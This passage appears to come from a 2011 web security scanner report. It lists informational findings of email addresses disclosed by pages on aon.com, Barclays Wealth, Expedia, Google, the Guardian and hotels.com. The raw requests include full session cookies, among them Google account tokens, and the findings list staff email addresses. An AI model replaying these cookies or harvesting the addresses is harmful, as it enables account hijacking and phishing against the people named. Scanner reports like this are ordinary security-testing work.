rn false}stLight.processSTQ();stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.debug("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b=stLight.getSource();stLight.log("pview",b,"");stWidget.options.sessionID=stLight.sessionID;stWidget.options.fpc=stLight.fpc;stLight.loadServicesLoggedIn(function(){stButtons.onRead
...[SNIP]...
22.17. http://www.aon.com/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/s_code.js HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/manchesterunited/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26688-1241617105000"
Last-Modified: Wed, 06 May 2009 13:38:25 GMT
Content-Type: text/javascript
Content-Length: 26688
Date: Sun, 02 Oct 2011 23:58:41 GMT

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...
22.18. http://www.barclayswealth.com/Scripts/swfobject_modified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclayswealth.com
Path:   /Scripts/swfobject_modified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Scripts/swfobject_modified.js HTTP/1.1
Host: www.barclayswealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD_STATEFUL_f8c38b02-59b3-11de-be40-001a64b96864=%2F; BIGipServerwpl_GRN_TEST3_static_http_pool=1948654764.14535.0000

Response

HTTP/1.1 404 Not found
content-type: text/html
date: Sun, 02 Oct 2011 23:58:04 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
vary: accept-encoding
cache-control: public,max-age=3600
Content-Length: 11007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<head>
...[SNIP]...
<a href="mailto:bw_webteam@barclayswealth.com">
...[SNIP]...
22.19. http://www.barclayswealth.com/important-information.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclayswealth.com
Path:   /important-information.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /important-information.htm HTTP/1.1
Host: www.barclayswealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD_STATEFUL_f8c38b02-59b3-11de-be40-001a64b96864=%2F; BIGipServerwpl_GRN_TEST3_static_http_pool=1948654764.14535.0000; sifrFetch=true; __utma=1.1111853373.1317599886.1317599886.1317599886.1; __utmb=1.10.10.1317599886; __utmc=1; __utmz=1.1317599886.1.1.utmcsr=cdn.flashtalking.com|utmccn=(referral)|utmcmd=referral|utmcct=/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317618188776:ss=1317617886010; __utma=1.1111853373.1317599886.1317599886.1317599886.1; __utmb=1.11.10.1317599886; __utmc=1; __utmz=1.1317599886.1.1.utmcsr=cdn.flashtalking.com|utmccn=(referral)|utmcmd=referral|utmcct=/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf; _wt.mode-79569=e1f36dbd085f0041d284; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 03 Oct 2011 00:03:17 GMT
etag: W/"12576-4e788ec6"
last-modified: Tue, 20 Sep 2011 13:01:58 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
vary: accept-encoding
cache-control: public,max-age=3600
Content-Length: 75126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<head>
...[SNIP]...
<a href="mailto:complaint.info@financial-ombudsman.org.uk"><strong>complaint.info@financial-ombudsman.org.uk</strong>
...[SNIP]...
22.20. http://www.expedia.com/static/default/default/scripts/formController.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/scripts/formController.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/default/default/scripts/formController.js?v=release-2011-09-r3.10.274201 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"17449-1317085613183"
Last-Modified: Tue, 27 Sep 2011 01:06:53 GMT
Content-Type: text/javascript
Cteonnt-Length: 17449
Content-Length: 17449
Vary: Accept-Encoding
Cache-Control: private, max-age=37298
Date: Mon, 03 Oct 2011 00:10:36 GMT
Connection: close

/**
* @fileOverview Contains jQuery plugin code for form manipulation
* @version 0.9
* @author Jay Boyer <jboyer@expedia.com>
*/
/**
* See (http://jquery.com/).
* @name jQuery
* @namesp
...[SNIP]...
22.21. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjXmxcb1SChjECiXSjEaqO-DnawkdCeNdpQ1eq5H7VQaB1TYoVNaHivfCOnRdR3nNOQ08CAf6CRApbTves9jTDvA3EsEz817LyYCYCbZsTHriQICDzjjFZGK6LqC9xB10_TSh1omi0Cz3S6WTEQKI4YWzinp7wd_vo_RGZ0Q7Pmh8a7ryXTtM1Q9zJgPjGhZAWlQtcmVUtvW6l7weDo9XnzQ4xsrHMoS73ySwvooWqNnqucKMrgZgH8M9keX_Pz9mAcFTAqTRl1KdCO3svISfz05dJpITuMlwLigsrRt_DeV0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 119232

<!doctype html> <head> <title>sabre travel - Google Search</title> <script>window.google={kEI:"mvyIToKwK-vViAKS4LWcDA",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"
...[SNIP]...
on(){m.prm&&m.prm()},Va=function(a){t("m",function(){m.spn(a)})},Wa=function(a){t("m",function(){m.spp(a)})};n("spn",Va);n("spp",Wa);Ca("gbd4",Ua);
if(_tvb("true",e)){var Xa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};p.prf=Xa}
if(_tvv("1")&&_tvv(
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...
22.22. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/2011/sep/27/manchester-united-basel-live

Issue detail

The following email addresses were disclosed in the response:

Request

GET /football/2011/sep/27/manchester-united-basel-live HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; OAX_tmp=4d686437616b36492b4b304142554a59; _publishflow=4galn0lq98x95vrg; member_type=0; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D27%3B; GU_ST=; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:55 GMT
Server: Apache
X-GU-jas: 54-23155
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; path=/; domain=.guardian.co.uk; expires=Sun, 23-Oct-2011 23:57:55 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 121369
Connection: close


<!DOCTYPE html><html lang="en">

<head>
                <script type="text/javascript" >
document.domain = "guardian.co.uk";

...[SNIP]...
<a href="mailto:barry.glendenning@guardian.co.uk">barry.glendenning@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:football.editor@guardianunlimited.co.uk">
...[SNIP]...
<a href="mailto:reader@guardian.co.uk">reader@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:letters@guardian.co.uk">letters@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:userhelp@guardian.co.uk">userhelp@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:football.editor@guardianunlimited.co.uk">
...[SNIP]...
<a href="mailto:reader@guardian.co.uk">reader@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:letters@guardian.co.uk">letters@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:userhelp@guardian.co.uk">userhelp@guardian.co.uk</a>
...[SNIP]...
22.23. http://www.hotels.com/hotel/details.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:28:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=H7gAAAAAAAIAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:28:19 GMT
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Content-Length: 238921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<a id="header_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: hotel details page description tab|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
<li>emailaddress1@domain.com</li>
<li>emailaddress2@domain.com</li>
...[SNIP]...
<a id="toplinks_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: hotel details page description tab|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
eDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true",
serverSideTab: "description",
pageType: "dateful",
feedbackHref: "mailto:userexperience@hotels.com?subject=Site feedback: {0};POS: en_US",
pushpinImg: "/images/static/map/map_pin_hotel_active_us.png",
googleClientId: "gme-expedia",
queryFormMVTVariant: true,
cognitiveMatchCarouselHo
...[SNIP]...
22.24. http://www.hotels.com/search.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search.do

Issue detail

The following email address was disclosed in the response:

Request

GET /search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=ZgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:04 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Content-Length: 368925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="header_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: search result with dates|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
<a id="toplinks_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: search result with dates|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
22.25. http://www.hotels.com/search/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search/search.html

Issue detail

The following email address was disclosed in the response:

Request

GET /search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
